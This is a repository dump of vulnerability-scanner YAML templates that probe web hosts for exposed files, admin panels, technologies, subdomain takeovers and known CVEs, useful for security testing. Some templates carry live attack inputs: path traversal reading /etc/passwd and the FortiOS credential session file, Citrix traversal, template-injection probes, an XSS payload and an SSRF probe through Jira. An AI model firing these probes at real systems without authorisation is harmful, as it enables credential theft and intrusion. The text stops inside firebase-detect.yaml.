├── .yamllint ├── files ├── git-config.yaml ├── wp-xmlrpc.yaml ├── debug-pprof.yaml ├── dir-listing.yaml ├── exposed-svn.yaml ├── jkstatus-manager.yaml ├── drupal-install.yaml ├── laravel-env.yaml ├── telerik-fileupload-detect.yaml ├── wordpress-user-enumaration.yaml ├── jolokia.yaml ├── tomcat.yaml ├── firebase-detect.yaml ├── tomcat-scripts.yaml ├── apc_info.yaml ├── docker-registry.yaml ├── elasticsearch.yaml ├── wadl-files.yaml ├── security.txt.yaml ├── server-status-localhost.yaml ├── phpinfo.yaml └── zip-backup-files.yaml ├── .pre-commit-config.yaml ├── examples ├── basic-http-example.yaml ├── basic-dns-example.yaml ├── dns-multiple-example.yaml ├── http-raw.yaml ├── http-multiple-matcher.yaml ├── http-multiple-matcher-condition.yaml ├── http-raw-multiple.yaml └── http-intruder-fuzz.yaml ├── panels ├── crxde.yaml ├── grafana-detect.yaml ├── docker-api.yaml ├── compal.yaml ├── mongo-express-web-gui.yaml ├── supervpn-panel.yaml ├── fortinet-fortigate-panel.yaml ├── cisco-asa-panel.yaml ├── globalprotect-panel.yaml ├── parallels-html-client.yaml ├── jenkins-asyncpeople.yaml ├── kubernetes-pods.yaml ├── sap-netweaver-detect.yaml ├── pulse-secure-panel.yaml ├── swagger-panel.yaml ├── sophos-fw-version-detect.yaml ├── phpmyadmin-panel.yaml └── webeditors.yaml ├── technologies ├── sap-netweaver-detect.yaml ├── citrix-vpn-detect.yaml ├── github-enterprise-detect.yaml ├── home-assistant.yaml ├── jenkins-headers-detect.yaml ├── s3-detect.yaml ├── sql-server-reporting.yaml ├── tool-detect.yaml ├── aem-cms-finder.yaml ├── weblogic-detect.yaml ├── werkzeug-debugger-detect.yaml ├── jira-detect.yaml ├── gitlab-detect.yaml ├── jaspersoft-detect.yaml ├── reverse-proxy-detect.yaml ├── graphql.yaml ├── cms-detect.yaml ├── programming-language-detect.yaml ├── web-framework-detect.yaml ├── cdn.yaml ├── linkerd-badrule-detect.yaml ├── linkerd-ssrf-detect.yaml ├── web-server.yaml ├── ntlm-directories.yaml └── tech-detect.yaml ├── cves ├── CVE-2019-19781.yaml ├── CVE-2018-16341.yaml 
├── CVE-2018-13379.yaml ├── CVE-2018-6389.yaml ├── CVE-2017-9506.yaml ├── CVE-2018-3760.yaml ├── CVE-2018-14728.yaml ├── CVE-2018-1247.yaml ├── CVE-2020-5284.yaml ├── CVE-2019-12314.yaml ├── CVE-2020-2096.yaml ├── CVE-2018-7490.yaml ├── CVE-2019-19368.yaml ├── CVE-2019-8982.yaml ├── CVE-2020-8115.yaml ├── CVE-2019-3799.yaml ├── CVE-2019-19908.yaml ├── CVE-2018-18069.yaml ├── CVE-2018-5230.yaml ├── CVE-2019-8903.yaml ├── CVE-2018-2791.yaml ├── CVE-2018-20824.yaml ├── CVE-2019-5418.yaml ├── CVE-2019-14974.yaml ├── CVE-2018-19439.yaml ├── CVE-2020-8512.yaml ├── CVE-2019-11510.yaml ├── CVE-2018-1000129.yaml ├── CVE-2020-5410.yaml ├── CVE-2018-0296.yaml ├── CVE-2019-2588.yaml ├── CVE-2018-1271.yaml ├── CVE-2017-7529.yaml ├── CVE-2019-3396.yaml ├── CVE-2020-12720.yaml └── CVE-2019-10475.yaml ├── vulnerabilities ├── twig-php-ssti.yaml ├── rce-shellshock-user-agent.yaml ├── wordpress-duplicator-path-traversal.yaml ├── moodle-filter-jmol-xss.yaml ├── discourse-xss.yaml ├── wordpress-wordfence-xss.yaml ├── moodle-filter-jmol-lfi.yaml ├── x-forwarded-host-injection.yaml ├── crlf-injection.yaml ├── cached-aem-pages.yaml ├── pdf-signer-ssti-to-rce.yaml └── open-redirect.yaml ├── dns ├── servfail-refused-hosts.yaml ├── filter-valid.yaml ├── filter-wildcard.yaml ├── dead-host-with-cname.yaml ├── cname-service-detector.yaml ├── azure-cnames-finder.yaml └── azure-takeover-detection.yaml ├── subdomain-takeover ├── pantheon.io.yaml ├── worksites-takeover.yaml └── detect-all-takeovers.yaml ├── .github └── workflows │ └── syntax-checking.yml ├── security-misconfiguration ├── basic-cors-flash.yaml ├── rack-mini-profiler.yaml ├── basic-cors.yaml ├── front-page-misconfig.yaml ├── jira-service-desk-signup.yaml └── springboot-detect.yaml ├── basic-detections ├── basic-xss-prober.yaml └── general-tokens.yaml ├── tokens ├── google-api-key.yaml ├── mailchimp-api-key.yaml ├── aws-access-key-value.yaml ├── amazon-mws-auth-token-value.yaml ├── http-username-password.yaml └── 
slack-access-token.yaml ├── README.md ├── LICENSE └── GUIDE.md /.yamllint: -------------------------------------------------------------------------------- 1 | --- 2 | extends: default 3 | 4 | rules: 5 | document-start: disable 6 | line-length: disable 7 | new-lines: disable 8 | new-line-at-end-of-file: disable 9 | truthy: disable 10 | -------------------------------------------------------------------------------- /files/git-config.yaml: -------------------------------------------------------------------------------- 1 | id: git-config 2 | 3 | info: 4 | name: Git Config Disclosure 5 | author: Ice3man 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/.git/config" 12 | matchers: 13 | - type: word 14 | words: 15 | - "[core]" 16 | -------------------------------------------------------------------------------- /.pre-commit-config.yaml: -------------------------------------------------------------------------------- 1 | repos: 2 | - repo: https://github.com/pre-commit/pre-commit-hooks 3 | rev: v2.3.0 4 | hooks: 5 | - id: end-of-file-fixer 6 | - id: trailing-whitespace 7 | - repo: https://github.com/adrienverge/yamllint.git 8 | rev: v1.17.0 9 | hooks: 10 | - id: yamllint 11 | -------------------------------------------------------------------------------- /examples/basic-http-example.yaml: -------------------------------------------------------------------------------- 1 | id: basic-http-test 2 | 3 | info: 4 | name: Test File 5 | author: pdteam 6 | severity: info 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/test.txt" 12 | matchers: 13 | - type: word 14 | words: 15 | - "This is test!" 
16 | -------------------------------------------------------------------------------- /files/wp-xmlrpc.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-xmlrpc-file 2 | 3 | info: 4 | name: WordPress xmlrpc 5 | author: udit_thakkur 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/xmlrpc.php" 12 | matchers: 13 | - type: status 14 | status: 15 | - 405 16 | -------------------------------------------------------------------------------- /panels/crxde.yaml: -------------------------------------------------------------------------------- 1 | id: crxde 2 | 3 | info: 4 | name: CRXDE Lite 5 | author: nadino 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/crx/de/index.jsp" 12 | matchers: 13 | - type: word 14 | words: 15 | - "CRXDE Lite" 16 | -------------------------------------------------------------------------------- /files/debug-pprof.yaml: -------------------------------------------------------------------------------- 1 | id: debug-pprof 2 | 3 | info: 4 | name: pprof debug file 5 | author: pdteam 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/debug/pprof/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Types of profiles available" 16 | -------------------------------------------------------------------------------- /technologies/sap-netweaver-detect.yaml: -------------------------------------------------------------------------------- 1 | id: SAP-Netweaver-Detect 2 | info: 3 | name: SAP NetWeaver Detect 4 | author: rakeshmane10 5 | severity: informative 6 | requests: 7 | - method: GET 8 | path: 9 | - '{{BaseURL}}/irj/portal' 10 | matchers: 11 | - type: word 12 | words: 13 | - NetWeaver 14 | -------------------------------------------------------------------------------- /cves/CVE-2019-19781.yaml: -------------------------------------------------------------------------------- 1 | id: 
CVE-2019-19781 2 | 3 | info: 4 | name: Citrix ADC Directory Traversal 5 | author: organiccrap 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/vpn/../vpns/cfg/smb.conf" 12 | matchers: 13 | - type: word 14 | words: 15 | - "[global]" 16 | -------------------------------------------------------------------------------- /files/dir-listing.yaml: -------------------------------------------------------------------------------- 1 | id: dir-listing 2 | 3 | info: 4 | name: Directory listing enabled 5 | author: _harleo 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Index of /" 16 | - "[To Parent Directory]" 17 | -------------------------------------------------------------------------------- /panels/grafana-detect.yaml: -------------------------------------------------------------------------------- 1 | id: grafana-detect 2 | 3 | info: 4 | name: Grafana panel detect 5 | author: organiccrap 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/login" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Grafana" 16 | part: body 17 | -------------------------------------------------------------------------------- /technologies/citrix-vpn-detect.yaml: -------------------------------------------------------------------------------- 1 | id: citrix-vpn-detect 2 | 3 | info: 4 | name: Citrix VPN Detection 5 | author: bauthard 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/vpn/index.html" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Citrix Gateway" 16 | -------------------------------------------------------------------------------- /technologies/github-enterprise-detect.yaml: -------------------------------------------------------------------------------- 1 | id: Github-Enterprise-Detect 2 | 3 | info: 4 | name: Detect Github Enterprise 5 | author: ehsahil 6 | 
severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/login" 12 | matchers: 13 | - type: word 14 | words: 15 | - "GitHub · Enterprise" 16 | -------------------------------------------------------------------------------- /panels/docker-api.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-docker-api 2 | 3 | info: 4 | name: Exposed Docker API 5 | author: furkansenan 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}:2376/version' 12 | matchers: 13 | - type: word 14 | words: 15 | - "Version" 16 | - "Docker" 17 | part: body 18 | -------------------------------------------------------------------------------- /technologies/home-assistant.yaml: -------------------------------------------------------------------------------- 1 | id: home-assistant 2 | 3 | info: 4 | name: Detect Home Assistant 5 | author: fabaff 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}:8123/" 12 | - "{{BaseURL}}/" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Home Assistant" 17 | -------------------------------------------------------------------------------- /technologies/jenkins-headers-detect.yaml: -------------------------------------------------------------------------------- 1 | id: jenkins-headers-detect 2 | 3 | info: 4 | name: Jenkins Headers Based Detection 5 | author: ice3man 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "X-Jenkins" 16 | part: header 17 | -------------------------------------------------------------------------------- /panels/compal.yaml: -------------------------------------------------------------------------------- 1 | id: compal-panel-detect 2 | 3 | info: 4 | name: Compal CH7465LG panel detect 5 | author: fabaff 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - 
"{{BaseURL}}/common_page/login.html" 12 | matchers: 13 | - type: word 14 | words: 15 | - "" 16 | part: body 17 | -------------------------------------------------------------------------------- /panels/mongo-express-web-gui.yaml: -------------------------------------------------------------------------------- 1 | id: mongo-express-web-gui 2 | 3 | info: 4 | name: Mongo Express Web GUI 5 | author: puzzlepeaches 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Set-Cookie: mongo-express=" 16 | part: header 17 | -------------------------------------------------------------------------------- /technologies/s3-detect.yaml: -------------------------------------------------------------------------------- 1 | id: s3-detect 2 | 3 | info: 4 | name: Detect Amazon-S3 Bucket 5 | author: melbadry9 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/%c0" 12 | matchers: 13 | - type: regex 14 | regex: 15 | - "(?:InvalidURI|InvalidArgument|NoSuchBucket)" 16 | part: body 17 | -------------------------------------------------------------------------------- /files/exposed-svn.yaml: -------------------------------------------------------------------------------- 1 | id: exposed-svn 2 | 3 | info: 4 | name: Exposed SVN Directory 5 | author: udit_thakkur 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/.svn/entries" 12 | matchers: 13 | - type: word 14 | words: 15 | - "dir" 16 | - type: status 17 | status: 18 | - 200 19 | -------------------------------------------------------------------------------- /panels/supervpn-panel.yaml: -------------------------------------------------------------------------------- 1 | id: supervpn-detect 2 | 3 | info: 4 | name: SuperVPN panel detect 5 | author: organiccrap 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/admin/login.html" 12 | 
matchers: 13 | - type: word 14 | words: 15 | - "Sign In-SuperVPN" 16 | part: body 17 | -------------------------------------------------------------------------------- /technologies/sql-server-reporting.yaml: -------------------------------------------------------------------------------- 1 | id: sql-server-reporting 2 | 3 | info: 4 | name: Detect Microsoft SQL Server Reporting 5 | author: puzzlepeaches 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/Reports/Pages/Folder.aspx" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Report Manager" 16 | -------------------------------------------------------------------------------- /vulnerabilities/twig-php-ssti.yaml: -------------------------------------------------------------------------------- 1 | id: twig-php-ssti 2 | 3 | info: 4 | name: Twig PHP <2.4.4 template engine - SSTI 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/search?search_key={{1337*1338}}" 12 | matchers: 13 | - type: word 14 | words: 15 | - "1788906" 16 | part: body 17 | -------------------------------------------------------------------------------- /cves/CVE-2018-16341.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-16341 2 | 3 | info: 4 | name: Nuxeo Authentication Bypass Remote Code Execution 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/nuxeo/login.jsp/pwn${1330+7}.xhtml" 12 | matchers: 13 | - type: word 14 | words: 15 | - "1337" 16 | part: body 17 | -------------------------------------------------------------------------------- /panels/fortinet-fortigate-panel.yaml: -------------------------------------------------------------------------------- 1 | id: fortinet-fortigate-panel 2 | 3 | info: 4 | name: Fortinet FortiGate SSL VPN Panel 5 | author: bsysop 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 
11 | - "{{BaseURL}}/remote/login" 12 | matchers: 13 | - type: word 14 | words: 15 | - "/remote/fgt_lang" 16 | part: body 17 | -------------------------------------------------------------------------------- /technologies/tool-detect.yaml: -------------------------------------------------------------------------------- 1 | id: tool-detect 2 | 3 | info: 4 | name: Tool Detect 5 | author: NkxxkN https://twitter.com/NkkxN 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/" 12 | matchers: 13 | - type: word 14 | name: clockwork 15 | words: 16 | - "X-Clockwork-Id" 17 | part: header 18 | -------------------------------------------------------------------------------- /cves/CVE-2018-13379.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-13379 2 | 3 | info: 4 | name: FortiOS - Credentials Disclosure 5 | author: organiccrap 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" 12 | matchers: 13 | - type: word 14 | words: 15 | - "var fgt_lang =" 16 | -------------------------------------------------------------------------------- /dns/servfail-refused-hosts.yaml: -------------------------------------------------------------------------------- 1 | id: servfail-refused-hosts 2 | 3 | info: 4 | name: Servfail Host Finder 5 | author: mzack9999 6 | severity: informative 7 | 8 | dns: 9 | - name: "{{FQDN}}" 10 | type: A 11 | class: inet 12 | recursion: true 13 | retries: 3 14 | matchers: 15 | - type: word 16 | words: 17 | - "SERVFAIL" 18 | - "REFUSED" 19 | -------------------------------------------------------------------------------- /panels/cisco-asa-panel.yaml: -------------------------------------------------------------------------------- 1 | id: cisco-asa-panel-detect 2 | 3 | info: 4 | name: Cisco ASA VPN panel detect 5 | author: organiccrap 6 | severity: informative 7 | 8 | 
requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/+CSCOE+/logon.html" 12 | matchers: 13 | - type: word 14 | words: 15 | - "SSL VPN Service" 16 | part: body 17 | -------------------------------------------------------------------------------- /panels/globalprotect-panel.yaml: -------------------------------------------------------------------------------- 1 | id: globalprotect-panel 2 | 3 | info: 4 | name: PaloAlto Networks GlobalProtect Panel 5 | author: organiccrap 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/global-protect/login.esp" 12 | matchers: 13 | - type: word 14 | words: 15 | - "GlobalProtect Portal" 16 | -------------------------------------------------------------------------------- /subdomain-takeover/pantheon.io.yaml: -------------------------------------------------------------------------------- 1 | id: pantheon-io-takeover 2 | 3 | info: 4 | name: Find Pantheon.io subdomain takeover 5 | author: pxmme1337 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "The gods are wise, but do not know of the site which you seek." 
16 | -------------------------------------------------------------------------------- /files/jkstatus-manager.yaml: -------------------------------------------------------------------------------- 1 | id: jkstatus-manager 2 | 3 | info: 4 | name: JK Status Manager 5 | author: bauthard 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | headers: 11 | X-Forwarded-For: "127.0.0.1" 12 | path: 13 | - "{{BaseURL}}/jkstatus/" 14 | matchers: 15 | - type: word 16 | words: 17 | - "JK Status Manager" 18 | -------------------------------------------------------------------------------- /panels/parallels-html-client.yaml: -------------------------------------------------------------------------------- 1 | id: parallels-html-client 2 | 3 | info: 4 | name: Parallels HTML5 Client 5 | author: bauthard 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/RASHTML5Gateway/" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Parallels HTML5 Client" 16 | part: body 17 | -------------------------------------------------------------------------------- /files/drupal-install.yaml: -------------------------------------------------------------------------------- 1 | id: drupal-install 2 | 3 | info: 4 | name: Drupal Install 5 | author: NkxxkN 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/install.php?profile=default" 12 | redirects: true 13 | max-redirects: 1 14 | matchers: 15 | - type: word 16 | words: 17 | - "Choose language | Drupal" 18 | -------------------------------------------------------------------------------- /files/laravel-env.yaml: -------------------------------------------------------------------------------- 1 | id: laravel-env 2 | 3 | info: 4 | name: Laravel .env file 5 | author: pxmme1337 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/.env" 12 | matchers-condition: and 13 | matchers: 14 | - type: word 15 | words: 16 | - "APP_NAME" 17 | - type: status 
18 | status: 19 | - 200 20 | -------------------------------------------------------------------------------- /technologies/aem-cms-finder.yaml: -------------------------------------------------------------------------------- 1 | id: aem-cms-finder 2 | 3 | info: 4 | name: AEM Finder 5 | author: mzack9999 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}" 12 | matchers: 13 | - type: word 14 | words: 15 | - "/etc/clientlibs/" 16 | - "/content/dam/" 17 | part: body 18 | condition: or 19 | -------------------------------------------------------------------------------- /technologies/weblogic-detect.yaml: -------------------------------------------------------------------------------- 1 | id: WebLogic-Detect 2 | 3 | info: 4 | name: Detect Weblogic 5 | author: bing0o 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}:7001/console/login/LoginForm.jsp" 12 | - "{{BaseURL}}/console/login/LoginForm.jsp" 13 | matchers: 14 | - type: word 15 | words: 16 | - "WebLogic" 17 | -------------------------------------------------------------------------------- /cves/CVE-2018-6389.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-6389 2 | 3 | info: 4 | name: Wordpress Load Script 5 | author: nadino 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/wp-admin/load-scripts.php?load=" 12 | matchers: 13 | - type: dsl 14 | dsl: 15 | - 'contains(x_powered_by,"Engine")' 16 | - 'contains(content_type,"javascript")' 17 | -------------------------------------------------------------------------------- /panels/jenkins-asyncpeople.yaml: -------------------------------------------------------------------------------- 1 | id: jenkins-async-people 2 | 3 | info: 4 | name: Jenkins panel async-people 5 | author: nadino 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/asynchPeople/" 12 | 
matchers: 13 | - type: word 14 | words: 15 | - "People - [Jenkins]" 16 | part: body 17 | -------------------------------------------------------------------------------- /cves/CVE-2017-9506.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2017-9506 2 | 3 | info: 4 | name: Jira IconURIServlet SSRF 5 | author: Ice3man 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json" 12 | matchers: 13 | - type: word 14 | words: 15 | - "ipinfo.io/missingauth" 16 | part: body 17 | -------------------------------------------------------------------------------- /examples/basic-dns-example.yaml: -------------------------------------------------------------------------------- 1 | id: basic-dns-example 2 | 3 | info: 4 | name: Basic DNS Request 5 | author: pdteam 6 | severity: info 7 | 8 | dns: 9 | - name: "{{FQDN}}" 10 | type: CNAME 11 | class: inet 12 | recursion: true 13 | retries: 3 14 | matchers: 15 | - type: word 16 | words: 17 | # The response must contain a CNAME record 18 | - "IN\tCNAME" 19 | -------------------------------------------------------------------------------- /subdomain-takeover/worksites-takeover.yaml: -------------------------------------------------------------------------------- 1 | id: worksites-takeover 2 | 3 | info: 4 | name: Find worksites-takeover 5 | author: melbadry9 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/" 12 | matchers: 13 | - type: regex 14 | regex: 15 | - "(?:Company Not Found|you’re looking for doesn’t exist)" 16 | part: body 17 | -------------------------------------------------------------------------------- /dns/filter-valid.yaml: -------------------------------------------------------------------------------- 1 | id: filter-valid 2 | 3 | info: 4 | name: Valid Domains Filter 5 | author: mzack9999 6 | severity: informative 7 | 8 | dns: 9 | - name: 
"{{FQDN}}" # Random prefix 10 | type: A 11 | class: inet 12 | recursion: true 13 | retries: 3 14 | matchers: 15 | - type: word 16 | words: 17 | - "NOERROR" 18 | - "IN\tCNAME" 19 | - "IN\tA" 20 | -------------------------------------------------------------------------------- /technologies/werkzeug-debugger-detect.yaml: -------------------------------------------------------------------------------- 1 | id: werkzeug-debugger-detect 2 | 3 | info: 4 | name: Werkzeug debugger console 5 | author: pdnuclei - projectdiscovery.io 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/console" 12 | matchers: 13 | - type: word 14 | words: 15 | - "

Interactive Console

" 16 | part: body 17 | -------------------------------------------------------------------------------- /technologies/jira-detect.yaml: -------------------------------------------------------------------------------- 1 | id: jira-detect 2 | 3 | info: 4 | name: Detect Jira Issue Management Software 5 | author: bauthard 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/secure/Dashboard.jspa" 12 | - "{{BaseURL}}/jira/secure/Dashboard.jspa" 13 | matchers: 14 | - type: word 15 | words: 16 | - "Project Management Software" 17 | -------------------------------------------------------------------------------- /cves/CVE-2018-3760.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-3760 2 | 3 | info: 4 | name: Rails cve-2018-3760 5 | author: 0xrudra 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/assets/file:%2f%2f/etc/passwd" 12 | matchers: 13 | - type: status 14 | status: 15 | - 200 16 | - type: regex 17 | regex: 18 | - "root:[x*]:0:0:" 19 | part: body 20 | -------------------------------------------------------------------------------- /files/telerik-fileupload-detect.yaml: -------------------------------------------------------------------------------- 1 | id: telerik-fileupload-detect 2 | 3 | info: 4 | name: Detect Telerik Web UI fileupload handler 5 | author: organiccrap 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/Telerik.Web.UI.WebResource.axd?type=rau" 12 | matchers: 13 | - type: word 14 | words: 15 | - "RadAsyncUpload handler is registered successfully" 16 | -------------------------------------------------------------------------------- /.github/workflows/syntax-checking.yml: -------------------------------------------------------------------------------- 1 | name: syntax-checking 2 | 3 | on: [push, pull_request] 4 | 5 | jobs: 6 | build: 7 | runs-on: ubuntu-latest 8 | steps: 9 | - uses: 
actions/checkout@v2 10 | - name: Yamllint 11 | uses: karancode/yamllint-github-action@master 12 | with: 13 | yamllint_config_filepath: .yamllint 14 | yamllint_strict: false 15 | yamllint_comment: true 16 | -------------------------------------------------------------------------------- /dns/filter-wildcard.yaml: -------------------------------------------------------------------------------- 1 | id: filter-wildcard 2 | 3 | info: 4 | name: Wildcard Filter 5 | author: mzack9999 6 | severity: informative 7 | 8 | dns: 9 | - name: "0831058744.{{FQDN}}" # Random prefix 10 | type: A 11 | class: inet 12 | recursion: true 13 | retries: 3 14 | matchers: 15 | - type: word 16 | words: 17 | - "NXDOMAIN" 18 | - "SERVFAIL" 19 | - "REFUSED" 20 | -------------------------------------------------------------------------------- /files/wordpress-user-enumaration.yaml: -------------------------------------------------------------------------------- 1 | id: wordpress-user-enumaration 2 | 3 | info: 4 | name: Wordpress user enumeration 5 | author: Manas_Harsh 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/wp-json/wp/v2/users/" 12 | matchers: 13 | - type: status 14 | status: 15 | - 200 16 | - type: word 17 | words: 18 | - avatar_urls 19 | -------------------------------------------------------------------------------- /cves/CVE-2018-14728.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-14728 2 | 3 | info: 4 | name: Responsive filemanager 9.13.1 - SSRF/LFI 5 | author: madrobot 6 | severity: high 7 | 8 | requests: 9 | - method: POST 10 | path: 11 | - "{{BaseURL}}/filemanager/upload.php" 12 | 13 | body: "fldr=&url=file:///etc/passwd" 14 | 15 | matchers: 16 | - type: regex 17 | regex: 18 | - "root:[x*]:0:0:" 19 | part: body 20 | -------------------------------------------------------------------------------- /files/jolokia.yaml: 
-------------------------------------------------------------------------------- 1 | id: jolokia instance 2 | 3 | info: 4 | name: Jolokia Version Disclosure 5 | author: mavericknerd 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/jolokia/version' 12 | - '{{BaseURL}}:8080/jolokia/version' 13 | matchers: 14 | - type: word 15 | words: 16 | - '"agent":' 17 | - type: status 18 | status: 19 | - 200 20 | -------------------------------------------------------------------------------- /security-misconfiguration/basic-cors-flash.yaml: -------------------------------------------------------------------------------- 1 | id: basic-cors-misconfig-flash 2 | 3 | info: 4 | name: Basic CORS misconfiguration exploitable with Flash 5 | author: nadino 6 | severity: low 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/crossdomain.xml" 12 | matchers: 13 | - type: word 14 | words: 15 | - 'allow-access-from domain="*"' 16 | part: body 17 | -------------------------------------------------------------------------------- /basic-detections/basic-xss-prober.yaml: -------------------------------------------------------------------------------- 1 | id: basic-xss-prober 2 | 3 | info: 4 | name: Basic XSS Prober 5 | author: nadino 6 | severity: low 7 | 8 | # Basic XSS prober 9 | # Manual testing needed for exploitation 10 | 11 | requests: 12 | - method: GET 13 | path: 14 | - "{{BaseURL}}/%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e" 15 | matchers: 16 | - type: word 17 | words: 18 | - "'>" 19 | -------------------------------------------------------------------------------- /cves/CVE-2018-1247.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2018-1247 2 | 3 | info: 4 | name: RSA Authentication Manager XSS 5 | author: madrobot 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - 
"{{BaseURL}}/IMS-AA-IDP/common/scripts/iua/pmfso.swf?sendUrl=/&gotoUrlLocal=javascript:alert(1337)//" 12 | matchers: 13 | - type: word 14 | words: 15 | - "application/x-shockwave-flash" 16 | part: header 17 | -------------------------------------------------------------------------------- /files/tomcat.yaml: -------------------------------------------------------------------------------- 1 | id: tomcat-instance 2 | 3 | info: 4 | name: tomcat manager disclosure 5 | author: Ahmed Sherif 6 | severity: informative 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - '{{BaseURL}}/manager/html' 12 | - '{{BaseURL}}:8080/manager/html' 13 | matchers: 14 | - type: word 15 | words: 16 | - '"Unauthorized":' 17 | - type: status 18 | status: 19 | - 401 20 | -------------------------------------------------------------------------------- /security-misconfiguration/rack-mini-profiler.yaml: -------------------------------------------------------------------------------- 1 | id: rack-mini-profiler 2 | 3 | info: 4 | name: rack-mini-profiler environment information disclosure 5 | author: vzamanillo 6 | severity: high 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/?pp=env" 12 | matchers: 13 | - type: word 14 | words: 15 | - "Rack Environment" 16 | - type: status 17 | status: 18 | - 200 19 | -------------------------------------------------------------------------------- /cves/CVE-2020-5284.yaml: -------------------------------------------------------------------------------- 1 | id: CVE-2020-5284 2 | 3 | info: 4 | name: Next.js .next/ limited path traversal 5 | author: Harsh & Rahul 6 | severity: medium 7 | 8 | requests: 9 | - method: GET 10 | path: 11 | - "{{BaseURL}}/_next/static/../server/pages-manifest.json" 12 | matchers: 13 | - type: regex 14 | regex: 15 | - '\{"/_app":".*?_app\.js"' 16 | - type: status 17 | status: 18 | - 200 19 | -------------------------------------------------------------------------------- /files/firebase-detect.yaml: 
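id: firebase-detect

info:
  name: firebase detect
  author: organiccrap
  severity: low
  # http://ghostlulz.com/google-exposed-firebase-database/

requests:
  - method: GET
    path:
      # A bogus auth token makes a Firebase Realtime Database reply with a
      # parse error, which identifies the database without credentials.
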